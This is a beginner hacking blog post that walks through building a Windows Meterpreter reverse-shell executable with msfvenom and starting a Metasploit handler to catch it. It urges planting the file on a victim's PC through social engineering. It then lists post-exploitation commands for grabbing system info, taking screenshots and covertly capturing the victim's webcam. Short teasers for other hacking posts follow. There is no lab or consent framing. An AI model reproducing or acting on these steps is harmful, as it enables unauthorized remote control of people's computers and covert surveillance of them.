Skip to main content

Hack a Windows Computer By Using a Simple Payload



Hello Friends! Today we learn “how to hack computers for beginners”.Before reading this blog, read my previous blog in which I show you How To Hack Mobile Phone Using Kali Linux.  Similarly, You can hack windows by sending a payload to the victim’s PC.


Once the user installs the payload your meterpreter session starts running and then you do anything with the victim’s PC. You can send this payload via social engineering and here lots of methods present to send that payload to the victim’s system.


DON’T MISS:- How To Hack Wifi Password Using Kali Linux? 


Let’s Start, Open your terminal and type

ifconfig

to know your private IP.

Find IP of the system

then type

msfvenom -p windows/meterpreter/reverse_tcp lhost=’Your Private IP’ lport=4444 -f exe -a x86 > hackingblogs.exe

and then hit enter and your payload for windows is ready. Your payload is present in the root folder. Now, transfer this payload to your victim’s PC.


making payload an how to hack computers for beginners

Now open your Metasploit by typing

msfconsole

msfconsole start

After opening Metasploit. Just configure some settings. By typing

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost ‘Your Private IP’

set lport 4444

exploit

starting exploiting

Now, install the payload to the victim’s system and then you see here you get meterpreter session. So, enjoy the victim’s system is hacked and now you can change and configure anything to this hack PC. But here, I will show you some commands of using it. type

sysinfo

to check the information of the system.

system is hacked and we see the sys info

type

screenshot

This will capture a screenshot of the victim’s PC.

i take screenshot here

You can also try webcam_snap & webcam_stream for taking pictures from victim’s device camera without knowing her. If you want some more commands then type

help

this will show you many different commands which you can use an exploit.

this shows help

If you want more interesting stuff like this then do subscribe to my blog. It’s free of cost and if you want to read more interesting articles like this then you can go to my table of the content page by clicking here.

Comments

Popular posts from this blog

Hacking Simulator | Geek Prank Hacker Typer Online

Hacking Simulator Do you love the sight from a movie where a masked man sitting in a dark keep hitting the keys on the keyboard and eventually ends up hacking certain organizations’ databases? So, you also want to do that in real life but not sure about how you are going to get your hands-on hacking because Hacking is something that is seen as an illegal practice. So, the developers come up with the idea of “ Hacking Simulator ” that solves all the problems related to legitimacy while practicing hacking in real life. Hacking Simulator can be used by the people who are just practicing hacking for fun and by the  professional hackers  too for continuously practicing and upgrading their skills. Hacking Simulator Online Hack the box: HTB is an online platform for hackers across the globe to test their penetration testing knowledge and It provides the user with the platform as well as resources to test their hacking and penetration testing tools. It has over 276k+ users on its plat...

What Is Vishing Attack? How To Prevent Vishing? Brief Guide

Vishing Hello Guys! Today we are going to learn about a very interesting term that is  vishing  that is also known as ‘ Phishing over Voice Call ‘. There are both pros and cons of the digital era we are living in. Peoples are using this technology which indicates their second identity. So, it’s very important to stay safe there also.  We  Hacking Blogs  are here to help you with the black hat hackers. We want our readers to stay safe online. We have discussed the  Phishing Attacks ,  Smishing Attacks , How hackers are able to hack your Instagram Account and many more. You can find interesting posts by  clicking here . But today we want to introduce with a very common attack that is Vishing. This is a very common attack almost everyone knows about this. What Is Vishing Attack? Vishing is made up of two words “ Voice Call ” and “ Phishing “. This is completely a Social Engineering attack. In this, Black Hat Attacker calls to the victim’s device and ...

OSINT tutorial to Find Information from a Phone Number – PhoneInfoga Tool

phone number plays a vital role in the social engineering and the open source intelligence investigation. Everyone carry’s phone, the  phone is now linked with an individual life and it has the most important information of a person. In the  OSINT investigation , we need to find-out the line type, carrier, location and other relevant information about the subject’s phone number. The number itself shows some information like country, city (landline pattern) and sometimes carrier; while the other information can be extracted by using the open platform available.   This tutorial is about PhoneInfoga, as the  official doc  says: “PHONEINFOGA IS ONE OF THE MOST ADVANCED TOOLS TO SCAN PHONE NUMBERS USING ONLY FREE RESOURCES. THE GOAL IS TO FIRST GATHER STANDARD INFORMATION SUCH AS COUNTRY, AREA, CARRIER AND LINE TYPE ON ANY INTERNATIONAL PHONE NUMBERS WITH A VERY GOOD ACCURACY. THEN SEARCH FOR FOOTPRINTS ON SEARCH ENGINES TO TRY TO FIND THE VOIP PR...